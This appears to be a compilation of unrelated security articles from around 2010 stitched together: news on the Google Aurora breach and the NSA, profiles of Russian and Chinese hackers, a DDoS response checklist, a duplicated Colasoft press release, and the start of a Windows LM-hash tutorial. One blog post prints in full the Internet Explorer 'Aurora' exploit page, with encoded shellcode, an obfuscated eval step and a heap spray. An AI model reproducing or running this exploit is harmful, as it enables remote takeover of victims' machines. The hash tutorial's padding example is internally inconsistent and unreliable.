Network Monitor

Google has turned to the National Security Agency for technical assistance to learn more about the computer network attackers who breached the company’s cybersecurity defenses last year, a person with direct knowledge of the agreement said Thursday.

The collaboration between Google, the world’s largest search engine company, and the federal agency in charge of global electronic surveillance raises both civil liberties issues and new questions about how much Google knew about the electronic thefts it experienced when it stated last month that it might end its business operations in China, where it said the attacks originated. The agreement was first reported on Wednesday evening by The Washington Post.

By turning to the N.S.A., which has no statutory authority to investigate domestic criminal acts, instead of the Department of Homeland Security, which does have such authority, Google is clearly seeking to avoid having its search engine, e-mail and other Web services regulated as part of the nation’s “critical infrastructure.”

The United States government has become increasingly concerned about the computer risks confronting energy and water distribution systems and financial and communications networks. Systems designated as critical infrastructure are increasingly being held to tighter regulatory standards.

On Jan. 12, Google announced a “new approach to China,” stating that the attacks were “highly sophisticated” and came from China. At the time, it gave few details about the attacks other than to say that a theft of its intellectual property had occurred and that a primary goal of the attackers had been to gain access to the Gmail accounts of Chinese human rights activists.

In reaching out to the N.S.A., which has extensive abilities to monitor global Internet traffic, the company may have been hoping to gain more certainty about the identity of the attackers. A number of computer security consultants who worked with other companies that experienced attacks similar to those of Google have stated that the surveillance system was controlled from a series of compromised server computers based in Taiwan. It is not clear how Google determined that the attacks originated in China.

A Google spokeswoman said the company was declining to comment on the case beyond what it published last month. An N.S.A. spokeswoman said, “N.S.A. is not able to comment on specific relationships we may or may not have with U.S. companies,” but added, the agency worked with “a broad range of commercial partners” to ensure security of information systems.

The agency’s responsibility to secure the government’s computer networks almost certainly was another reason Google turned to it, said a former federal computer security specialist.

“This is the other side of N.S.A. — this is the security service that does defensive measures,” said the specialist, James A. Lewis, a director at the Center for Strategic and International Studies. “It’s not unusual for people to go to N.S.A. and say ‘please take a look at my code.’ ”

The agreement will not permit the agency to have access to information belonging to Google users, but it still reopens long-standing questions about the role of the agency.

“Google and N.S.A. are entering into a secret agreement that could impact the privacy of millions of users of Google’s products and services around the world,” said Marc Rotenberg, executive director of the Electronic Privacy Information Center, a Washington-based policy group. On Thursday, the organization filed a lawsuit against the N.S.A., calling for the release of information about the agency’s role as it was set out in National Security Presidential Directive 54/Homeland Security Presidential Directive 23 , a classified 2008 order issued by President George W. Bush dealing with cybersecurity and surveillance.

Concerns about the nation’s cybersecurity have greatly increased in the past two years. On Tuesday, Dennis C. Blair, the director of national intelligence, began his annual threat testimony before Congress by saying that the threat of a crippling attack on telecommunications and other computer networks was growing, as an increasingly sophisticated group of enemies had “severely threatened” the sometimes fragile systems behind the country’s information infrastructure.

“Malicious cyberactivity is occurring on an unprecedented scale with extraordinary sophistication,” he told the committee.

The relationship that the N.S.A. has struck with Google is known as a cooperative research and development agreement, according to a person briefed on the relationship. These were created as part of the Federal Technology Transfer Act of 1986 and are essentially a written agreement between a private company and a government agency to work together on a specific project. They are intended to help accelerate the commercialization of government-developed technology.

In addition to the N.S.A., Google has been working with the F.B.I. on the attack inquiry, but the bureau has so far declined to comment publicly or to share information about the intrusions with Congress.

THE St Petersburg link to the hacking debacle has highlighted what Russians have long known - their excellence in cybercrime.

Russian hackers have shown time and again that they can break into the networks of foreign government, multinationals and banks and then create havoc. Graduates of Soviet universities, most of them Jewish emigres, have long provided programmers for companies in America and Israel.

But many of today’s Russian whiz-kids prefer the challenge and rewards of hacking. Most of the best known Western internet providers pulled out of Russia long ago after being robbed of tens of thousands of pounds by computer criminals.

Already this year St Petersburg hackers have been charged with defrauding telephone companies of up to £70,000 by stealing passwords and selling them to foreign students to make cheap calls home. Another hacker has been accused of gaining access to 300,000 credit card numbers. Arguably the most famous computer fraudster, Vladmir Levin, came from St Petersburg. He was sentenced in America to three years in jail for defrauding Citibank.

Russian computer hooligans are also thought to have played a major role in disrupting Nato e-mail systems during last year’s bombing of Yugoslavia. The forbiddingly high level of graduates of Soviet and later Russian maths and physics institutes is one explanation for the country’s status as a world leader in computer crime.

Even before personal computers reached the Soviet Union, the brightest Russians understood how they worked better than many of their counterparts in the West.

CHANGSHA, China — With a few quick keystrokes, a computer hacker who goes by the code name Majia calls up a screen displaying his latest victims.

“Here’s a list of the people who’ve been infected with my Trojan horse,” he says, working from a dingy apartment on the outskirts of this city in central China. “They don’t even know what’s happened.”

As he explains it, an online “trapdoor” he created just over a week ago has already lured 2,000 people from China and overseas — people who clicked on something they should not have, inadvertently spreading a virus that allows him to take control of their computers and steal bank account passwords.

Majia, a soft-spoken college graduate in his early 20s, is a cyberthief.

He operates secretly and illegally, as part of a community of hackers who exploit flaws in computer software to break into Web sites, steal valuable data and sell it for a profit.

Internet security experts say China has legions of hackers just like Majia, and that they are behind an escalating number of global attacks to steal credit card numbers, commit corporate espionage and even wage online warfare on other nations, which in some cases have been traced back to China.

Three weeks ago, Google blamed hackers that it connected to China for a series of sophisticated attacks that led to the theft of the company’s valuable source code. Google also said hackers had infiltrated the private Gmail accounts of human rights activists, suggesting the effort might have been more than just mischief.

In addition to independent criminals like Majia, computer security specialists say there are so-called patriotic hackers who focus their attacks on political targets. Then there are the intelligence-oriented hackers inside the People’s Liberation Army, as well as more shadowy groups that are believed to work with the state government.

Indeed, in China — as in parts of Eastern Europe and Russia — computer hacking has become something of a national sport, and a lucrative one. There are hacker conferences, hacker training academies and magazines with names like Hacker X Files and Hacker Defense, which offer tips on how to break into computers or build a Trojan horse, step by step.

For less than $6, one can even purchase the “Hacker’s Penetration Manual.” (Books on hacking are also sold, to a lesser extent, in the United States and elsewhere.)

And with 380 million Web users in China and a sizzling online gaming market, analysts say it is no wonder Chinese youths are so skilled at hacking. Many Chinese hackers interviewed over the last few weeks describe a loosely defined community of computer devotees working independently, but also selling services to corporations and even the military. Because it is difficult to trace hackers, exactly who is behind any specific attack and how and where they operate remains to a large extent a mystery, technology experts say.

And that is just the way Majia, the young Chinese hacker, wants it. On condition that he not be identified by his real name, Majia agreed two weeks ago to allow a reporter to visit his modest home in a poor town outside Changsha, and watch him work.

Slim and smartly dressed in black, Majia seemed eager to tell his story; like many hackers, he wants recognition for his hacking skills even as he prizes anonymity to avoid detection. The New York Times found him through another well-known hacker who belongs to a hacker group and vouched that Majia was skilled at what he did.

While Majia’s claims, of course, cannot be verified, he is happy to demonstrate his hacking skills. He met a journalist at a cafe one night just over a week ago, and then invited him to his home, where he showed how he hacked into the Web site of a Chinese company. Once the Web site popped up on his screen, he created additional pages and typed the word “hacked” onto one of them.

Majia says he fell in love with hacking in college, after friends showed him how to break into computer systems during his freshman year.

After earning a degree in engineering, he took a job with a government agency, largely to please his parents. But every night after work, he turns to his passion: hacking.

He is consumed by the challenges it presents. He reads hacker magazines, swaps information with a small circle of hackers and writes malicious code. He uses Trojan horses to sneak into people’s computers and infect them, so he can take control.

“Most hackers are lazy,” he says, seated in front of a computer in his spare bedroom, which overlooks a dilapidated apartment complex. “Only a few of us can actually write code. That’s the hard part.”

Computer hacking is illegal in China. Last year, Beijing revised and stiffened a law that makes hacking a crime, with punishments of up to seven years in prison. Majia seems to disregard the law, largely because it is not strictly enforced. But he does take care to cover his tracks.

Partly, he admits, the lure is money. Many hackers make a lot of money, he says, and he seems to be plotting his own path. Exactly how much he has earned, he won’t say. But he does admit to selling malicious code to others; and boasts of being able to tap into people’s bank accounts by remotely operating their computers.

Financial incentives motivate many young Chinese hackers like Majia, experts say. Scott J. Henderson, author of “The Dark Visitor: Inside the World of Chinese Hackers,” said he had spent years tracking Chinese hackers, sometimes with financial help from the United States government. One Chinese hacker who broke into a United States government site later lectured on hacking at a leading university, Mr. Henderson said, and worked for China’s security ministry. But recently, many have been seeking to profit from stealing data from big corporations, he said, or teaching others how to hijack computers.

“They make a lot of money selling viruses and Trojan horses to infect other people’s computers,” Mr. Henderson said in a telephone interview. “They also break into online gaming accounts, and sell the virtual characters. It’s big money.”

Majia lives with his parents, and his bedroom has little more than a desktop computer, a high-speed Internet connection and a large closet. The walls are bare.

Most of his socializing occurs online, where he works from about 6:30 p.m. to 12:30 a.m., starting every evening by perusing computer Web sites like cnBeta.com.

Asked why he doesn’t work for a major Chinese technology company, he sneers at the suggestion, saying that it would restrain his freedom.

He even claims to know details of the Google attack. “That Trojan horse on Google was created by a foreign hacker,” he says, indicating that the virus was then altered in China. “A few weeks before Google was hijacked, there was a similar virus. If you opened a particular page on Google, you were infected.”

Oddly, Majia said his parents did not know that he was hacking at night. But at one point, he explained the intricacies of computer hacking and stealing data while his mother stood nearby, listening silently, while offering a guest oranges and candy.

Majia and his fellow hackers keep secret their knowledge of certain so-called zero-day vulnerabilities — software flaws — for future use, he says.

“Microsoft and Adobe have a lot of zero days,” he said, while scanning Web sites at home. “But we don’t publish them. We want to save them so that some day we can use them.”

When asked whether hackers work for the government, or the military, he says “yes.”

Does he? No comment, he says.

The big news hit earlier this week that the attack vector that allowed bad actors presumably from China into the networks of Google, Juniper, Adobe, and some 29 other firms was an Internet Explorer zero day, a use after free vulnerability on an invalid pointer reference affecting IE 6, 7, and 8 but only used by attackers on IE 6 according to Microsoft. Per Microsoft’s Advisory 979352: “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution. Earlier today this entry from yesterday at Wepawet (an online analysis engine for malware) was pointed out to H.D. Moore, and within hours Metasploit has an exploit of the vulnerability integrated. McAfee has confirmed that the exploit is out and the same one they saw during the investigation. The video below demonstrates how crackers initially gained access to the corporate networks of Google, et al. using this zero day attack.

Here It Is

The video below demonstrates how Google and the rest have been, according to most news reports, exploited via the “Aurora” vulnerability in Internet Explorer, and had their “intellectual property” taken.

In the video you will see Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.

A silly example for demonstration to be sure, but once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.

The Vector

The attack scenario is that users were pointed to a web site (probably through a targeted Spam e-mail, an attack called spear phishing) containing a JavaScript that references this invalid pointer and injects the included shell code. The code below was released publicly yesterday.

<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
  arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
  );
  cc = cc.replace(/@/g, ",");
  eval(cc);
  var x1 = new Array();
  for (i = 0; i < 200; i ++ ){
    x1[i] = document.createElement("COMMENT");
    x1[i].data = "abc";
  }
  ;
  var e1 = null;
  function ev1(evt){
    e1 = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 50);
  }
  function ev2(){
    p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
    for (i = 0; i < x1.length; i ++ ){
      x1[i].data = p;
    }
    ;
    var t = e1.srcElement;
  }
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>

Update

• Ahmed Obied has published a clean python version of the exploit (opens your Windows Calculator) for testing also: ie_aurora.py.
• CVE-2010-0249 has been opened for this issue.

Finally

“At this time, we are aware of limited, active attacks attempting to use this vulnerability against Internet Explorer 6. We have not seen attacks against other affected versions of Internet Explorer.” – Microsoft.

This situation has the potential to change rapidly now that it appears the exploit has been found. Microsoft last patched a vulnerability off cycle in July of 2009, they could elect to pursue the same response here.

Or as McAfee correctly opines: “What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.”

Colasoft Announced the Release of Capsa Network Analyzer 7.1

Chengdu, China - February 3, 2010 - Colasoft, an innovative provider of all-in-one and easy-to-use network analyzer software, today announced the newest version of its flagship product- Capsa Network Analyzer. Version 7.1 is based on the second-generation Colasoft Packet Analysis Engine (CSPAE), which substantially improved the data processing speed and guaranteed the analysis performance in large traffic networks.

“With the latest Microsoft Office 2007 style, Colasoft Capsa 7.1 provides you a brand new user interface and enhanced user experience.” The new design is intended to display statistics and diagnosis data in a simple-straight and graphical style so that users can get what they want with less clicks”, said Kevin Zhou, director of marketing. “Some unique features and ideas are introduced to Capsa7.1, like Network Profile, this function allows user to set and save network profiles for different environments (departments, clients), making their analysis more customized, accurate and efficient. Another prominent feature is Analysis Profile which provides flexible, extensible and effective analysis performance based on user’s analysis objectives”.

Following are the top 10 new features in Capsa 7.1:

• Brand New and Improved Network Analysis Experience
• Your Own Dashboard, Important Parameters in One Place and in Graphs.
• Record Network Profile, Boost Working Efficiency.
• Set Your Analysis Profile, Perform customized Analysis.
• Powerful Customizable Alarms.
• Replay Analysis, Reproduce History Network Events
• Custom Protocol, Analyze Unique Protocol Traffic.
• Enhanced, Customizable Report.
• Intuitive TCP Timing Sequence Chart.
• WYSIWYG (What You See Is What You Get) Packet Filter.

Capsa 7.1 runs under Windows XP/2003/Vista/7. A trial version is available for download at the company’s website: http://www.colasoft.com/download/

About Capsa

Capsa is an easy-to-use Ethernet packet sniffer (network analyzer or network sniffer) for network monitoring and troubleshooting purposes. It performs real-time packet capturing, 24/7 network monitoring, reliable network forensics, advanced protocol analyzing, in-depth packet decoding, and automatic expert diagnosing. By giving you insights into all of your network’s operations, Capsa makes it easy to isolate and solve network problems, identify network bottleneck and bandwidth use, and detect network vulnerabilities.

About Colasoft

Ever since 2001, Colasoft has been an innovative provider of all-in-one and easy-to-use software solutions for users to monitor network activities, analyze network performance, enhance network security, and troubleshoot network problems. Currently, more than 5000 customers in over 80 countries trust the company’s flagship product, Capsa Network Analyzer, as their network monitoring and troubleshooting solution. Featured customers include Alcatel, Airbus, Dell, Ericsson, IBM, Intel, and Pepsi. For more information about Colasoft and its solutions, please visit http://www.colasoft.com/

Colasoft, an innovative provider of all-in-one and easy-to-use network analyzer software,will release its newest version of its flagship product- Capsa Network Analyzer. Version 7.1 is based on the second-generation Colasoft Packet Analysis Engine (CSPAE), which substantially improved the data processing speed and guaranteed the analysis performance in large traffic networks.

“With the latest Microsoft Office 2007 style, Colasoft Capsa 7.1 provides you a brand new user interface and enhanced user experience.” The new design is intended to display statistics and diagnosis data in a simple-straight and graphical style so that users can get what they want with less clicks”, said Kevin Zhou, director of marketing. “Some unique features and ideas are introduced to Capsa7.1, like Network Profile, this function allows user to set and save network profiles for different environments (departments, clients), making their analysis more customized, accurate and efficient. Another prominent feature is Analysis Profile which provides flexible, extensible and effective analysis performance based on user’s analysis objectives”.

About Capsa

Capsa is an easy-to-use Ethernet packet sniffer (network analyzer or network sniffer) for network monitoring and troubleshooting purposes. It performs real-time packet capturing, 24/7 network monitoring, reliable network forensics, advanced protocol analyzing, in-depth packet decoding, and automatic expert diagnosing. By giving you insights into all of your network’s operations, Capsa makes it easy to isolate and solve network problems, identify network bottleneck and bandwidth use, and detect network vulnerabilities.

About Colasoft

Ever since 2001, Colasoft has been an innovative provider of all-in-one and easy-to-use software solutions for users to monitor network activities, analyze network performance, enhance network security, and troubleshoot network problems. Currently, more than 5000 customers in over 80 countries trust the company’s flagship product, Capsa Network Analyzer, as their network monitoring and troubleshooting solution. Featured customers include Alcatel, Airbus, Dell, Ericsson, IBM, Intel, and Pepsi. For more information about Colasoft and its solutions, please visit http://www.colasoft.com/

In my past decade-plus dealing with distributed denial-of-service attacks, I have noticed a few patterns in the way that companies handle these attacks. Usually when an unprepared virgin company is first attacked, all hell breaks loose. The lack of preparedness causes several chain reactions that make the situation worse. Addressing these most common mistakes ahead of time can help a situation tremendously.

When someone calls me for advice, the first few items I go over have nothing to do with fixing the attack. I’m giving advice that I think is common sense, and I’ve been surprised that others don’t find it obvious.

Here are my Top 10 To-do’s for making life less painful during an attack.

1. Don’t Panic

While the network and your services are exploding and bouncing offline, there must be someone that is comfortable enough to make good decisions. I’ve seen managers freak out and threaten everyone with the prospect of the company collapsing. I think they were trying to motivate people to figure out some solution, but they ended up creating more chaos during an already tough situation.

Once I saw employees hastily rip out the network’s firewalls and re-configure the load balancers. They ended up creating more mess than they had before because they were reacting to an angry and stressed manager.

You are going to create a disaster if you approach with a sledgehammer and wishes. Don’t let anyone make quick changes; try to follow your company’s policies. Sit back, analyze the problem, isolate the actual device that’s failing in the chain, and make an informed–and usually small–adjustment.

If you’re in the 10th hour and things don’t seem to be improving, gather everyone, go away from the office, have a beer, relax for 15 minutes, and talk about something positive. The information flow after that beer might just save you and motivate everyone to do a good job – the solution will come!

2. Create a contact list of external email addresses and phone numbers.

This one is sadistically funny. Most companies host their email, VoIP system, IRC, Wiki, databases, primary storage, etc. all in the same colocation behind the same network connection that hosts their web sites and services. This is, for lack of better words, stupid. All of your digital eggs are in one basket, and that basket is also holding a grenade. A DDoS attack ends up crippling the company’s infrastructure, leaving it with no phones, email, or any communications structure whatsoever.

I’ve seen CEOs of massive companies using their hotmail account and cell phone to contact me because it was their only way of communicating from their multi-million dollar offices.

If you insist on being an “eggs in one basket” company, keep a list of vital email accounts and cell phone numbers on a notepad. That way you can at least call your IT person when everything is down.

3. Setup a “War Room”

Convert your conference room into a war room. Get everyone that has influence in the company in that room. This includes marketing, IT, the CEO, etc. It ensures everyone is on the same page, leaders can lead, and everyone can be in sync.

I typically fill the room with a constant flow of healthy snacks, coffee, and other beverages. If you don’t have anything like that handy, order pizza immediately or send someone shopping.

4. Get one of your guys to the colo ASAP

If you are offline due to DDoS attack, chances are your IT staff cannot log in to the remotely hosted hardware in your datacenters. The easy solution is to physically get them there. They can console in to the hardware and actually see what is going wrong. It’s not fun, but it will result in a much faster resolution to the problem (Make sure they have folding chairs, cash for the vending machines, and serial cables).

5. Find an old hub

Yes, I said hub. You know, those old things that cause collisions? If you’re dealing with an attack and yours is like a lot of companies, it may be difficult for you to set up a traffic monitoring port on your main routers. Assuming you’re setup with Ethernet, at least you can bridge a hub in-line and connect a laptop to the hub and sniff or analyze the traffic!

This is key because having eyes into the data stream really helps figure out how to filter it. Pulling random cables and shutting down random services is not the solution. Make an informed call because you were thoughtful enough to have a hub or SPAN/Mirror port pre-configured.

6. Understand the nature of the attack

There’s a reason you are the target for this attack. Obviously there are a lot of reasons for any given attack, yet understanding the attacker’s motivation is key to creating a better defense strategy.

In the field I have observed a very strange phenomenon; the people working at a victim company usually have a gut feeling about why they are being attacked. So far, their gut instinct has been correct.

Some people know they are being extorted and some people feel it’s a competitor trying to shut them down. Others have a customer that has pissed someone off so the attacker takes down the whole company just to silence one customer. Maybe shutting down the attacker’s target for awhile may actually save the entire ship. Go with your gut on this, make a hypothesis and test it.

7. Document everything

Your business was just smacked around by some bad guys, but what proof do you have? If you don’t have any, then what do you think the law enforcement is going to do for you?

During the attack, lock down all your logs and assign someone within the company to be the custodian of the records. Save server logs, web logs, email logs, any packet capture, network graphs, reports – anything – including a timeline of events.

8. Call your ISP

Your ISP can help, however they have a process to follow. The process usually requires a ticket escalation requirement before you can get real help. If you call early in the attack and open a ticket, that can help you when you really need someone.

Your ISP also has hardware that may be capable of filtering or rate-limiting the attack. The more you know about the attack and you can point them in the right direction, the more they can help you.

They may also suggest you to sign up for their DDoS protection system. Don’t do that right away; reserve that until you are out of all other options. If you do sign up, make sure there is a service level agreement. In the meantime, there are a number of free services you can request:

Null routing of the target IP address
Router ACLs of the top attacking source addresses
New IP addresses
Detailed traffic reports

If you can find the guru at the ISP that knows how to fix these problems, that might be time well spent.

9. Setup “We are down” web hosting services

If the attack is running longer than you had anticipated and you don’t have a solution in sight, you could get your site working at least enough to communicate to your customers.

There are web-hosting companies, which as part of what they do, provide DDoS service level agreements. For a small amount of money you could quickly sign up with several of these companies, upload a “Sorry we’re down, but contact us here” page, and flip your DNS to the cluster of hosted servers.

Your customers will have more confidence in your performance and the attackers may get bored because the attack has not completely shut everything down. If this plan doesn’t work, at least you have diverted some of the attack away from your network.

10. Learn from the event

Post attack can be a blur; everyone is exhausted and burnt out. Mostly, everyone just wants the day-to-day atmosphere to return to status quo. Well, if you’ve been attacked and you did not learn and improve your strategy on how to deal with future attacks, then you are not doing your job.

You should start a review the very day after, while everything is fresh, and make sure that everyone is prepared. Go over what worked, what did not work, and how to improve your system’s overall technology.

Spend the money to fix things properly. Don’t just duct-tape it.

Introduction

Passwords tend to be our main and sometimes only line of defense against intruders. Even if attackers do not have physical access to a machine they can often access a server through the remote desktop protocol or authenticate to a service via an outward facing web application.

The purpose of this article is to educate you on how Windows creates and stores password hashes, and how those hashes are cracked. After demonstrating how to crack Windows passwords I will provide some tips for ensuring you are not vulnerable to these types of attacks.

How Windows Stores Passwords

Windows-based computers utilize two methods for the hashing of user passwords, both having drastically different security implications. These are LAN Manager (LM) and NT LAN Manager version 2 (NTLMv2). A hash is the result of a cryptographic function that takes an arbitrarily sized string of data, performs a mathematical encryption function on it, and returns a fixed-size string.

LM Password Hashes

The LAN Manager hash was one of the first password hashing algorithms to be used by Windows operating systems, and the only version to be supported up until the advent of NTLMv2 used in Windows 2000, XP, Vista, and 7. These newer operating systems still support the use of LM hashes for backwards compatibility purposes. However, it is disabled by default for Windows Vista and Windows 7.

The LM hash of a password is computed using a six step process:

1. The user’s password is converted into all uppercase letters
2. The password has null characters added to it until it equals 14 characters
3. The new password is split into two 7 character halves
4. These values are used to create two DES encryption keys, one from each half with a parity bit added to each to create 64 bit keys.
5. Each DES key is used to encrypt a preset ASCII string (KGS!@#$%), resulting in two 8-byte ciphertext values
6. The two 8-byte ciphertext values are combined to form a 16-byte value, which is the completed LM hash

In practice, the password “PassWord123” would be converted as follows:

1. PASSWORD123
2. PASSWORD123000
3. PASSWOR and D123000
4. PASSWOR1 and D1230001
5. E52CAC67419A9A22 and 664345140A852F61
6. E52CAC67419A9A22664345140A852F61

Figure 1: A password transformed into an LM hash

LM stored passwords have a few distinct disadvantages. The first of these is that the encryption is based on the Data Encyrption Standard (DES). DES originated from a 1970s IBM project that was eventually modified by NIST, sponsored by the NSA, and released as an ANSI standard in 1981. DES was considered secure for many years but came under scrutiny in the nineties due to its small key size of only 56-bits. This came to a head in 1998 when the Electronic Frontier Foundation was able to crack DES in about 23 hours. Since this, DES has been considered insecure and has since been replaced with Triple-DES and AES. In short, it’s another encryption standard that has fallen victim to modern computing power and can be cracked in no time at all.

